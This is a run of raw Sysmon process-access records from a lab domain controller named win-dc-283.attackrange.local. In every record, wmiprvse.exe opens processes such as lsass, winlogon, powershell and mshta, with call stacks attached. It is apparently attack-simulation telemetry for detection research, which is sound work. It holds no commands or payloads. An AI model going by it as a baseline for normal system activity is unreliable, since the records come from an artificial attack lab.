15:59:47.584{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1000-00000000A301}1160C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028054Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:47.584{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0F00-00000000A301}1112C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028053Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:47.584{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0E00-00000000A301}1080C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028052Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:47.584{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0D00-00000000A301}996C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028051Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:47.584{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4986-6008-0C00-00000000A301}608C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028050Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:47.584{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4985-6008-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028049Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:47.584{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4984-6008-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028048Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:47.397{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5372-6008-7F06-00000000A301}5808C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028047Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:47.397{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5372-6008-7E06-00000000A301}3400C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028046Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:47.397{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5372-6008-7D06-00000000A301}1804C:\Windows\System32\mshta.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028045Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:47.397{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5359-6008-4306-00000000A301}4856C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028044Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:47.397{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5357-6008-3E06-00000000A301}6760C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028043Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:47.397{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5356-6008-3906-00000000A301}4832C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028042Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:47.397{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5354-6008-3406-00000000A301}6596C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028041Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:47.397{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5353-6008-2F06-00000000A301}3716C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028040Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:47.397{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4FA9-6008-4405-00000000A301}7000C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028039Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:47.397{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4FA9-6008-4305-00000000A301}7420C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028038Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:47.397{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4DC0-6008-FB02-00000000A301}8056C:\Program Files\Internet Explorer\iexplore.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028037Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:47.397{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A9B-6008-1501-00000000A301}6076C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028036Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:47.397{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A99-6008-1401-00000000A301}5960C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028035Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 